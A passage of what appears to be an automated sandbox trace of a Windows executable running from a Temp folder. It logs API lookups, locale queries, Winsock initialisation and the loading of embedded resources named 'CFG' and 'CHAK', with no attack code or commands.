lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0093.742] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0093.742] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0093.742] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0093.742] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0093.742] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15053186184) returned 1 [0093.744] GetTickCount () returned 0x22bb1 [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15053324863) returned 1 [0093.744] GetTickCount () returned 0x22bb1 [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x2c4)) [0093.744] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x14b82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0093.744] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14a288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0093.744] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x14b82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0093.744] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x14b82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0093.745] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x14b82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0093.745] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x14b82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0093.745] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0093.745] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x14bf48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x14b82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x14bf48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0093.745] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x14bf48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0093.745] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0093.745] GetThreadLocale () returned 0x409 [0093.745] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.745] GetCurrentThreadId () returned 0xae8 [0093.745] GetCurrentThreadId () returned 0xae8 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0093.745] GetThreadLocale () returned 0x409 [0093.745] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.745] GetThreadLocale () returned 0x409 [0093.745] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.745] GetCurrentThreadId () returned 0xae8 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0093.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.746] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0093.747] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0093.747] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0093.748] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0093.749] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0093.796] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0093.796] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0093.797] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0093.797] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0093.802] GetACP () returned 0x4e4 [0093.802] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0093.802] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.802] GetTickCount () returned 0x22bef [0093.802] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15059112538) returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x30\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x53\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x55\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x30\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x62\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0093.802] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0093.802] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0093.803] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0093.803] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0093.803] LockResource (hResData=0x50d55c) returned 0x50d55c [0093.803] FreeResource (hResData=0x50d55c) returned 0 [0093.803] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.803] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.803] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.803] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.803] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d4f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.803] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14d4f60, cbMultiByte=38, 